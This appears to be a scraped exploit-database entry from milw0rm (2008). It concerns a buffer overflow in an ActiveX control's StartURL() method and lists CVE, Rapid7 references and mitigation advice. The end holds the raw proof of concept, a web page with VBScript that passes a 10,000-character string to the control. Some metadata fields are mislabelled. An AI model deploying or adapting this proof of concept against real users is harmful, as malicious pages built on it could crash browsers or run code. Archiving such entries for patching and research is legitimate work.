header-logo
Suggest Exploit
vendor:
Unknown
by:
milw0rm.com
9.3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2008-2799
CPE: 72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F
Metasploit: https://www.rapid7.com/db/vulnerabilities/centos_linux-cesa-2008-0616/https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2008-2799/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-2799/https://www.rapid7.com/db/vulnerabilities/suse-cve-2008-2799/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0569/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0549/https://www.rapid7.com/db/vulnerabilities/mfsa2008-21-cve-2008-2799/https://www.rapid7.com/db/vulnerabilities/windows-mozilla-multiple-vulns-2008-15/https://www.rapid7.com/db/vulnerabilities/mozilla-seamonkey-cve-2008-2799/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2008-2799/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0547/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0616/https://www.rapid7.com/db/vulnerabilities/centos_linux-cesa-2008-0547/https://www.rapid7.com/db/vulnerabilities/centos_linux-cesa-2008-0549/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

milw0rm.com [2008-07-17]

A buffer overflow vulnerability exists in the StartURL() method of the ActiveX control '72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F' when a long string is passed as an argument. This can be exploited to execute arbitrary code by tricking a user into visiting a malicious web page.

Mitigation:

Upgrade to the latest version of the ActiveX control.
Source

Exploit-DB raw data:

<html>
<body>

<object id=target
classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>
<script language=vbscript>

  arg1=String(10000, "A")
  target.StartURL(arg1)

</script>
</body>
</html>

# milw0rm.com [2008-07-17]

Navigation

Suggest Exploit

Services By CQR